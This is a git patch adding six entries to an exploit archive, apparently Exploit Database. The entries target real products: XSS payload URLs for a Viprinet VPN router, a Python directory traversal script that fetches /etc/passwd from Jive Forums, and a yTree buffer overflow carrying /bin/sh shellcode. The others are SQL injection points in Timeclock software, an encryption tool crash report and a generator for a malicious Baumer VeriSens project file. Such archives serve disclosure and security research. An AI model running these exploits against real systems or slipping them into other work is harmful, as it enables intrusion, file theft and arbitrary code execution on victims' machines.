From 1221dcb78e977508f414db75db7b188e99a134cf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 4 Feb 2016 05:01:40 +0000 Subject: [PATCH] DB: 2016-02-04 6 new exploits --- files.csv | 6 ++ platforms/hardware/webapps/39407.txt | 50 ++++++++++++++++ platforms/jsp/webapps/39405.py | 61 +++++++++++++++++++ platforms/linux/dos/39406.py | 72 ++++++++++++++++++++++ platforms/php/webapps/39404.txt | 37 ++++++++++++ platforms/windows/dos/39158.txt | 48 +++++++++++++++ platforms/windows/dos/39403.py | 90 ++++++++++++++++++++++++++++ 7 files changed, 364 insertions(+) create mode 100755 platforms/hardware/webapps/39407.txt create mode 100755 platforms/jsp/webapps/39405.py create mode 100755 platforms/linux/dos/39406.py create mode 100755 platforms/php/webapps/39404.txt create mode 100755 platforms/windows/dos/39158.txt create mode 100755 platforms/windows/dos/39403.py diff --git a/files.csv b/files.csv index f1bd7b91d..31f402f1f 100755 --- a/files.csv +++ b/files.csv @@ -35413,6 +35413,7 @@ id,file,description,date,author,platform,type,port 39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0 39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 +39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - DoS",2016-01-03,Vishnu,windows,dos,0 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 execve _/bin/sh_ - shellcode 24 byte",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote,0 @@ -35641,3 +35642,8 @@ id,file,description,date,author,platform,type,port 39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0 39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0 39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80 +39403,platforms/windows/dos/39403.py,"Baumer VeriSens Application Suite 2.6.2 - Buffer Overflow Vulnerability",2016-02-03,LiquidWorm,windows,dos,0 +39404,platforms/php/webapps/39404.txt,"Timeclock Software 0.995 - Multiple SQL Iinjection Vulnerabilities",2016-02-03,Benetrix,php,webapps,80 +39405,platforms/jsp/webapps/39405.py,"Jive Forums <= 5.5.25 - Directory Traversal Vulnerability",2016-02-03,"Zhaohuan of Tencent Security",jsp,webapps,80 +39406,platforms/linux/dos/39406.py,"yTree 1.94-1.1 - Local Buffer Overflow",2016-02-03,"Juan Sacco",linux,dos,0 +39407,platforms/hardware/webapps/39407.txt,"Viprinet Multichannel VPN Router 300 - Stored XSS Vulnerabilities",2016-02-03,Portcullis,hardware,webapps,0 diff --git a/platforms/hardware/webapps/39407.txt b/platforms/hardware/webapps/39407.txt new file mode 100755 index 000000000..5bf88b380 --- /dev/null +++ b/platforms/hardware/webapps/39407.txt @@ -0,0 +1,50 @@ + +Vulnerability title: Multiple Instances Of Cross-site Scripting In Viprinet Multichannel VPN Router 300 + +CVE: CVE-2014-2045 + +Vendor: Viprinet + +Product: Multichannel VPN Router 300 + +Affected version: 2013070830/2013080900 + +Fixed version: 2014013131/2014020702 +Reported by: Tim Brown +Details: + + The data supplied to both the `old’ and `new’ web applications (the device has two web based management interfaces) was permanently stored and could be retrieved later by other users. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser. + + Stored cross-site scripting could be triggered by: + + + Attempting to login with a username of `’ (affects `old’ interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log) + Creating an account with a username of `’ (affects both `old’ and `new’ interfaces once created) + Setting the device’s hostname to `’ (affects `old’ interface once created) + + + A number of locations were identified as being vulnerable to reflective attacks, including: + + +http:///exec?module=config&sessionid=&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E +http:///exec?tool=atcommands&sessionid=&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E +http:///exec?tool=ping&sessionid=&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56 + + + The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files. + + These are simply some examples of how this attack might be performed, and the it is believed that both the `old’ and `new’ web applications are systemically vulnerable to this. + + + +Further details at: + + https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/ + + + +Copyright: +Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. + +Disclaimer: +The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information. diff --git a/platforms/jsp/webapps/39405.py b/platforms/jsp/webapps/39405.py new file mode 100755 index 000000000..77de84b4d --- /dev/null +++ b/platforms/jsp/webapps/39405.py @@ -0,0 +1,61 @@ +''' +JiveForums <=5.5.25 Directory Traversal Vulnerability + +Description +========== +Jive forums is a widely recognized network community. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, Emc, Mcafee, Rapid7, Fireeye, etc. +The version of JiveForums <=5.5.25 and < 4.0 are vulnerable to a directory traversal security issue, other versions may also be affected. + +Details +======= +Product: JiveSoftware +Security-Risk: high +Remote-Exploit: yes +Vendor-URL: https://www.jivesoftware.com + +Credits +============ +Discovered by: Zhaohuan of Tencent Security +Site: http://security.tencent.com + +Affected Products: +================= +Test on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2 +maybe work <= 5.5.25 + +Exploit: +============ +''' + +#!/usr/bin/python +# Author: Zhaohuan || http://weibo.com/hackyou +# Google Dork: inurl:servlet/JiveServlet +# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2 +# +# Software Link: https://www.jivesoftware.com + +import urllib2 +import sys + +print "JiveForums <=5.5.25 Directory Traversal Exploit" + +if len(sys.argv) != 3: + print "[-] Trying exploit on : " + print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0] + sys.exit() + +payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg' +print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload +response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload) +readvul=response.read() +print readvul + + +''' +Solution: +============ +Update to jiveforums 5.5.30 or the latest version. + +More Information: +https://www.jivesoftware.com/services-support/ +''' \ No newline at end of file diff --git a/platforms/linux/dos/39406.py b/platforms/linux/dos/39406.py new file mode 100755 index 000000000..e8dc4bec9 --- /dev/null +++ b/platforms/linux/dos/39406.py @@ -0,0 +1,72 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com -jsacco@exploitpack.com +# Program affected: yTree - File manager for terminals v1.94-1.1 +# Description: yTree is prone to a stack-based overflow, an attacker could exploit +# this issue to execute arbitrary code in the context of the application. +# Failed exploit attempts will result in a denial-of-service condition. +# +# Tested and developed on: Kali Linux 2.0 x86 - https://www.kali.org +# +# Program Description: This is a file manager that separates files from directories +# and allows you to select and manage files from different directories. +# It works on black and white or color terminals and is UTF-8 locales aware. +# Vendor homepage: http://www.han.de/~werner/ytree.html +# Kali Linux 2.0 package: pool/main/y/ytree/ytree_1.94-1.1_i386.deb +# MD5sum: 7d55d9c7e8afb4405c149463613f596b +# +# Program received signal SIGSEGV, Segmentation fault. +# --------------------------------------------------------------------------[regs] +# EAX: 0x41414141 EBX: 0xB7FB8000 ECX: 0x00000000 EDX: 0x08071342 o d I t s z a P c +# ESI: 0xBFFFF134 EDI: 0x41414141 EBP: 0x0806FC60 ESP: 0xBFFFDC50 EIP: 0xB7F888C1 +# CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B +# --------------------------------------------------------------------------[code] +# => 0xb7f888c1 : mov eax,DWORD PTR [eax+0x4c] +# 0xb7f888c4 : mov DWORD PTR [esp+0x24],eax +# 0xb7f888c8 : mov eax,DWORD PTR [edi+0x50] +# 0xb7f888cb : mov DWORD PTR [esp+0x28],eax +# 0xb7f888cf : mov eax,DWORD PTR [edi+0x54] +# 0xb7f888d2 : mov DWORD PTR [esp+0x2c],eax +# 0xb7f888d6 : mov eax,DWORD PTR [edi+0x58] +# 0xb7f888d9 : mov DWORD PTR [esp+0x30],eax +# -------------------------------------------------------------------------------- +# 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5 +# gdb$ backtrace +# 0 0xb7f888c1 in werase () from /lib/i386-linux-gnu/libncursesw.so.5 +# 1 0x08050f43 in ?? () +# 2 0x08051182 in ?? () +# 3 0x0805972f in ?? () +# 4 0x0804a68a in ?? () +# 5 0xb7d82a63 in __libc_start_main (main=0x804a560, argc=0x2, argv=0xbffff294, init=0x8064df0, fini=0x8064de0, rtld_fini=0xb7fedc90 <_dl_fini>, stack_end=0xbffff28c) at libc-start.c:287 +# 6 0x0804a701 in ?? () + +import os,subprocess +def run(): + try: + print "# yTree Buffer Overflow by Juan Sacco" + print "# It's fuzzing time on unusable exploits" + print "# This exploit is for educational purposes only" + # JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*65 + shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*1200 + eip = "\xd0\xf6\xff\xbf" + subprocess.call(["ytree",' ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "Sorry, yTree not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Snap! Something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit yTree v1.94-1.1 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/php/webapps/39404.txt b/platforms/php/webapps/39404.txt new file mode 100755 index 000000000..4e797684e --- /dev/null +++ b/platforms/php/webapps/39404.txt @@ -0,0 +1,37 @@ +############################# +Exploit Title : Timeclock-software - Multiple SQL injections +Author:Marcela Benetrix +Date: 01/27/2016 +version: 0.995 (older version may be vulnerable too) +software link:http://timeclock-software.net + +############################# +Timeclock software + +Timeclock-software.net's free software product will be a simple solution to +allow your employees to record their time in one central location for easy +access. + +########################## +SQL Injection Location + +1. http://server/login.php +username and password were vulnerable to time-based blind sql injection +type. + +Moreover, once logged into the app; the following URLs were found to be +vulnerable too: + +2. http://server/view_data.php?period_id +3. http://server/edit_type.php?type_id= +4. http://server/edit_user.php?user_id= +5. http://server/edit_entry.php?time_id= + +All of them are vulnerable to Union query and time-based blind. + + +########################## +Vendor Notification +01/27/2016 to: the developers. They replied immediately and fixed the +problem in a new release +002/03/2016: Disclosure diff --git a/platforms/windows/dos/39158.txt b/platforms/windows/dos/39158.txt new file mode 100755 index 000000000..cc3656f91 --- /dev/null +++ b/platforms/windows/dos/39158.txt @@ -0,0 +1,48 @@ +Dear List, + +Greetings from vishnu (@dH4wk) + +1. Vulnerable Product + + - Advanced Encryption Package + - Company http://www.aeppro.com/ + +2. Vulnerability Information + + (A) Buffer OverFlow + Impact: Attacker gains administrative access + Remotely Exploitable: No + Locally Exploitable: Yes + + +3. Vulnerability Description + A 1006 byte causes the overflow. It is due to the inefficient/improper +handling of exception. This is an SEH based stack overflow and is +exploitable.. + +4. Reproduction: + It can be reproduced by pasting 1006 "A"s or any characters in the +field where the key file is asked during encryption of "*TEXT TO ENCRYPT *" +tab.. + + + +*Windbg Output* +============================================================== +(a34.a38): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Module load completed but symbols could not be loaded for +image00000000`00400000 +image00000000_00400000+0x19c0: +004019c0 f00fc108 lock xadd dword ptr [eax],ecx +ds:002b:4141413d=???????? + +(a34.a38): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +41414141 ?? +============================================================== + +Regards, +Vishnu Raju. diff --git a/platforms/windows/dos/39403.py b/platforms/windows/dos/39403.py new file mode 100755 index 000000000..29870cee8 --- /dev/null +++ b/platforms/windows/dos/39403.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python +# +# +# Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability +# +# +# Vendor: Baumer Holding AG | Baumer Optronic GmbH +# Product web page: http://www.baumer.com +# Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/ +# Affected version: 2.6.2 (ID-CS-XF-XC) +# +# Summary: The Baumer Application Suite is the intuitive configuration +# software for VeriSens vision sensors, which makes it quick and simple +# for even new users to implement image processing tasks. Starting with +# the creation of test tasks through to the management of jobs, the program +# will take you through just a few steps to reach your goal. +# +# Desc: The vulnerability is caused due to a boundary error in baselibs.dll +# library when processing device job file, which can be exploited to cause +# a buffer overflow when a user opens e.g. a specially crafted .APP file. +# Successful exploitation could allow execution of arbitrary code on the +# affected machine. +# +# ------------------------------------------------------------------------- +# (78c.cb0): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll - +# eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010 +# eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0 nv up ei pl nz na po nc +# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 +# baselibs!b_Int_restore+0x6: +# 56bc4186 8b00 mov eax,dword ptr [eax] ds:002b:4d81ab45=???????? +# 0:000> u +# baselibs!b_Int_restore+0x6: +# 56bc4186 8b00 mov eax,dword ptr [eax] +# 56bc4188 8bc8 mov ecx,eax +# 56bc418a 8bd0 mov edx,eax +# 56bc418c c1ea18 shr edx,18h +# 56bc418f c1f908 sar ecx,8 +# 56bc4192 81e100ff0000 and ecx,0FF00h +# 56bc4198 0bca or ecx,edx +# 56bc419a 8bd0 mov edx,eax +# 0:000> dds +# 56bc6b86 00107d80 +# 56bc6b8a 8b117457 +# 56bc6b8e f0e181cb +# 56bc6b92 e8000000 +# 56bc6b96 fffff9e6 +# 56bc6b9a 02ebf88b +# 56bc6b9e ff85fa8b +# 56bc6ba6 68000001 +# 56bc6baa 56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154 +# 56bc6bae 3f8ce857 +# 56bc6bb2 c483ffff +# 56bc6bb6 75c0850c USER32!SetKeyboardState+0x705a +# 56bc6bba 325b5f07 +# ------------------------------------------------------------------------- +# +# Tested on: Microsoft Windows 7 Professional SP1 (EN) +# Microsoft Windows 7 Ultimate SP1 (EN) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2016-5303 +# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php +# +# +# 14.11.2015 +# + +header = ("\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00" + "\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00" + " \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01" + "\x00\x00\x00\x00\x50\x00\x00\x00") #\x0F + +buffer = "\x41" * 6719 + "\x42\x42\x42\x42" + +f = open ("exploit.app", "w") +f.write(header + buffer +'\x0F') +f.close() +print "File exploit.app created!\n" + +# +# PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39403.zip +#